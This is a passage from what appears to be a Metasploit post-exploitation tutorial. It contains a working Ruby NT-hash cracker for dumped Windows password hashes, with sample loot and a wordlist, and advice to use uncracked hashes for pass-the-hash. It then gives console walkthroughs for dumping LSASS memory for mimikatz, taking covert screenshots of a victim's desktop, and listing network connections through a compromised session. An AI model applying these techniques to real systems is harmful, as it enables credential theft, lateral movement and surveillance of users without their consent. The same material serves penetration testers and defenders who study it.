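  R2_ORDER = [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15].freeze
  R3_ORDER = [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15].freeze

  def self.rotl(x, s)
    ((x << s) | (x >> (32 - s))) & MASK
  end

  def self.digest(msg)
    m = msg.b + "\x80".b                      # padding: 0x80, zeros, 64-bit LE bit length
    m << "\x00".b * ((56 - m.bytesize) % 64)
    m << [msg.bytesize * 8].pack('Q<')
    a, b, c, d = 0x67452301, 0xefcdab89, 0x98badcfe, 0x10325476
    m.unpack('V*').each_slice(16) do |x|
      aa, bb, cc, dd = a, b, c, d
      16.times do |i|                         # round 1: F(b,c,d) = (b & c) | (~b & d)
        a = rotl((a + ((b & c) | (~b & MASK & d)) + x[i]) & MASK, [3, 7, 11, 19][i % 4])
        a, b, c, d = d, a, b, c
      end
      16.times do |i|                         # round 2: G = majority(b, c, d)
        a = rotl((a + ((b & c) | (b & d) | (c & d)) + x[R2_ORDER[i]] + 0x5a827999) & MASK,
                 [3, 5, 9, 13][i % 4])
        a, b, c, d = d, a, b, c
      end
      16.times do |i|                         # round 3: H = b ^ c ^ d
        a = rotl((a + (b ^ c ^ d) + x[R3_ORDER[i]] + 0x6ed9eba1) & MASK, [3, 9, 11, 15][i % 4])
        a, b, c, d = d, a, b, c
      end
      a, b, c, d = (a + aa) & MASK, (b + bb) & MASK, (c + cc) & MASK, (d + dd) & MASK
    end
    [a, b, c, d].pack('V4')
  end

  def self.hexdigest(msg)
    digest(msg).unpack1('H*')
  end
end

EMPTY_LM = 'aad3b435b51404eeaad3b435b51404ee'  # LM field when LM hashing is disabled or the password is empty
EMPTY_NT = '31d6cfe0d16ae931b73c59d7e0c089c0'  # MD4("") : the NT hash of a blank password

# NT hash = MD4 over the password encoded as UTF-16LE (no salt, so a lookup table works).
def nt_hash(password)
  MD4.hexdigest(password.encode('UTF-16LE'))
end

# Parse pwdump lines; the "[+] " console prefix is tolerated so output can be pasted as-is.
def parse_pwdump(text)
  text.each_line.filter_map do |line|
    user, rid, lm, nt = line.strip.sub(/\A\[\+\]\s*/, '').split(':')
    next unless nt&.match?(/\A\h{32}\z/)
    { user: user, rid: rid.to_i, lm: lm.downcase, nt: nt.downcase }
  end
end

# {user => plaintext}: "" for a blank password, the wordlist hit, or nil when not recovered.
# The wordlist is hashed once, so cost is O(words + accounts), not O(words * accounts).
def crack(entries, wordlist)
  table = wordlist.to_h { |w| [nt_hash(w), w] }
  entries.to_h { |e| [e[:user], e[:nt] == EMPTY_NT ? '' : table[e[:nt]]] }
end

# Constructed sample: the two lines printed by smart_hashdump above, plus an invented
# account (svc_backup) whose NT hash is that of "password" so the wordlist path is exercised.
SAMPLE_LOOT = <<~'LOOT'
  [+] Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
  [+] admin1:1005:aad3b435b51404eeaad3b435b51404ee:579da618cfbfa85247acf1f800a280a4:::
  svc_backup:1006:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
LOOT
WORDLIST = %w[123456 password admin admin@123 Passw0rd].freeze

if __FILE__ == $PROGRAM_NAME
  crack(parse_pwdump(SAMPLE_LOOT), WORDLIST).each do |user, plain|
    puts "#{user}: #{plain.nil? ? 'not in wordlist' : plain.inspect}"
  end
end
```

For anything beyond a toy wordlist hand the loot file to hashcat (mode 1000) or john (--format=NT); the point of the script is to show why a blank NT hash and an unsalted MD4 make this cheap, and that a missed account still has value as-is, since an NT hash can be used directly for pass-the-hash.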
Dumping process memory to a file (post/windows/gather/memory_dump)
PID is the process to dump and DUMP_PATH the file the minidump is written to. The usual target is lsass.exe, whose dump can be parsed offline with mimikatz (sekurlsa::minidump), but opening LSASS for reading is one of the most reliably alerted actions on an EDR-monitored host.
msf6 post(windows/gather/memory_dump) > show options
Module options (post/windows/gather/memory_dump):
Name Current Setting Required Description
---- --------------- -------- -----------
DUMP_PATH yes File to write memory dump to
DUMP_TYPE standard yes Minidump size (Accepted: standard, full)
PID yes ID of the process to dump memory from
SESSION 1 yes The session to run this module on
Screen capture (post/windows/gather/screen_spy)
Takes COUNT screenshots DELAY seconds apart and stores them as loot. Capturing the screen requires a process attached to the interactive desktop, so if the session lives in a service process use PID to migrate into one of the logged-on user's processes first.
msf6 post(windows/gather/screen_spy) > show options
Module options (post/windows/gather/screen_spy):
Name Current Setting Required Description
---- --------------- -------- -----------
COUNT 6 yes Number of screenshots to collect
DELAY 5 yes Interval between screenshots in seconds
PID no PID to migrate into before taking the screenshots
RECORD true yes Record all screenshots to disk by saving them to loot
SESSION 1 yes The session to run this module on
VIEW_SCREENSHOTS false no View screenshots automatically
msf6 post(windows/gather/screen_spy) > run
[*] Capturing 6 screenshots with a delay of 5 seconds
[*] Screen Spying Complete
[*] run loot -t screenspy.screenshot to see file locations of your newly acquired loot
[*] Post module execution completed
msf6 post(windows/gather/screen_spy) > loot -t screenspy.screenshot
Loot
====
host service type name content info path
---- ------- ---- ---- ------- ---- ----
192.168.2.242 screenspy.screenshot screenshot.0.jpg image/jpg Screenshot /root/.msf4/loot/20220714040811_default_192.168.2.242_screenspy.screen_870404.jpg
192.168.2.242 screenspy.screenshot screenshot.1.jpg image/jpg Screenshot /root/.msf4/loot/20220714040816_default_192.168.2.242_screenspy.screen_288220.jpg
192.168.2.242 screenspy.screenshot screenshot.2.jpg image/jpg Screenshot /root/.msf4/loot/20220714040821_default_192.168.2.242_screenspy.screen_821367.jpg
192.168.2.242 screenspy.screenshot screenshot.3.jpg image/jpg Screenshot /root/.msf4/loot/20220714040826_default_192.168.2.242_screenspy.screen_873405.jpg
192.168.2.242 screenspy.screenshot screenshot.4.jpg image/jpg Screenshot /root/.msf4/loot/20220714040831_default_192.168.2.242_screenspy.screen_295092.jpg
192.168.2.242 screenspy.screenshot screenshot.5.jpg image/jpg Screenshot /root/.msf4/loot/20220714040837_default_192.168.2.242_screenspy.screen_210541.jpg
Network connections (post/windows/gather/tcpnetstat)
A netstat equivalent run through the session: listeners tell you what the host serves, established connections tell you where it talks to. The table includes the session's own connection back to the handler, which is exactly what a defender running netstat on the host would see.
msf6 post(windows/gather/tcpnetstat) > show options
Module options (post/windows/gather/tcpnetstat):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION 2 yes The session to run this module on
msf6 post(windows/gather/tcpnetstat) > run
[*] TCP Table Size: 552
[*] Total TCP Entries: 17
[*] Connection Table
================
STATE LHOST LPORT RHOST RPORT
----- ----- ----- ----- -----
CLOSE_WAIT 192.168.2.242 49250 35.186.238.101 80
ESTABLISHED 192.168.2.242 49251 35.186.238.101 80
ESTABLISHED 192.168.2.242 49255 192.168.2.200 3333
ESTABLISHED 192.168.2.242 49260 120.253.253.98 443
ESTABLISHED 192.168.2.242 49261 35.186.238.101 80
LISTEN 0.0.0.0 135 0.0.0.0 _
LISTEN 0.0.0.0 445 0.0.0.0 _
LISTEN 0.0.0.0 49152 0.0.0.0 _
LISTEN 0.0.0.0 49153 0.0.0.0 _
LISTEN 0.0.0.0 49154 0.0.0.0 _
LISTEN 0.0.0.0 49155 0.0.0.0 _
LISTEN 0.0.0.0 49156 0.0.0.0 _
LISTEN 0.0.0.0 49159 0.0.0.0 _
LISTEN 192.168.2.242 139 0.0.0.0 _
SYN_SENT 192.168.2.242 49262 172.217.160.74 443
SYN_SENT 192.168.2.242 49263 172.217.160.74 443
TIME_WAIT 192.168.2.242 49252 35.186.238.101 80
[*] Post module execution completed
